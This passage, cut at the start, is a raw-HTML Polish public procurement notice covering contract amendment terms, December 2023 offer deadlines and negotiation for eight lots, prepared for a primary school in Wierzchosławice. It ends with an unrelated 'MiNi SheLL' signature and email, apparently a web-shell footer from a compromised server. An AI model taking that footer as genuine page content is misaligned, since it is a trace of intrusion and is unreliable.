i<br/>zawarcia umowy w sprawie zamówienia publicznego. Oferta złożona przez spółkę cywilną traktowana jest jako oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp składa każdy z Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający dopuszcza możliwość dokonania zmiany postanowień zawartej umowy, w stosunku do treści oferty, w zakresie:<br/>1) urzędowej zmiany stawki podatku od towarów i usług (VAT), jeżeli zmiana stawki podatku od towarów i usług (VAT) powodować będzie zwiększenie lub zmniejszenie należnego wynagrodzenia Wykonawcy z umowy, (kosztów umowy po stronie Wykonawcy), Zamawiający dopuszcza zwiększenie lub zmniejszenie wynagrodzenia o kwotę równą różnicy w kwocie podatku naliczonego przez Wykonawcę;<br/>2) zmiany nazwy, adresu, formy organizacyjno - prawnej itp. którejkolwiek ze stron;<br/>3) sytuacji, których nie można było przewidzieć w chwili zawarcia niniejszej umowy i mających charakter zmian nieistotnych tj. nieodnoszących się do warunków, które gdyby zostały ujęte w ramach pierwotnej procedury udzielania zamówienia, umożliwiłyby dopuszczenie innej oferty niż ta, która została pierwotnie dopuszczona.<br/>2. Zmiana umowy na wniosek Wykonawcy wymaga wykazania okoliczności uprawniających do dokonania tej zmiany.<br/>3. Wszelkie zmiany postanowień zawartej Umowy mogą nastąpić wyłącznie na piśmie pod rygorem nieważności tych zmian. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-12-11 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-12-11 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-01-09</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <p class="mb-0">Część 3 : <span class="normal">Tak</span></p> <p class="mb-0">Część 4 : <span class="normal">Tak</span></p> <p class="mb-0">Część 5 : <span class="normal">Tak</span></p> <p class="mb-0">Część 6 : <span class="normal">Tak</span></p> <p class="mb-0">Część 7 : <span class="normal">Tak</span></p> <p class="mb-0">Część 8 : <span class="normal">Tak</span></p> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Postępowanie zostało przygotowane i jest przeprowadzone na wniosek i w porozumieniu Szkoły Podstawowej im. 100-lecia Ruchu Ludowego w Wierzchosławicach zgodnie z Uchwałą XXIX/186/2016 Rady Gminy Wierzchosławice z dnia 30 grudnia 2016 r. w sprawie organizacji wspólnej obsługi finansowo-księgowej, administracyjnej i organizacyjnej dla samorządowych jednostek budżetowych Gminy Wierzchosławice wraz z późniejszymi zmianami.

Creat By MiNi SheLL
Email: jattceo@gmail.com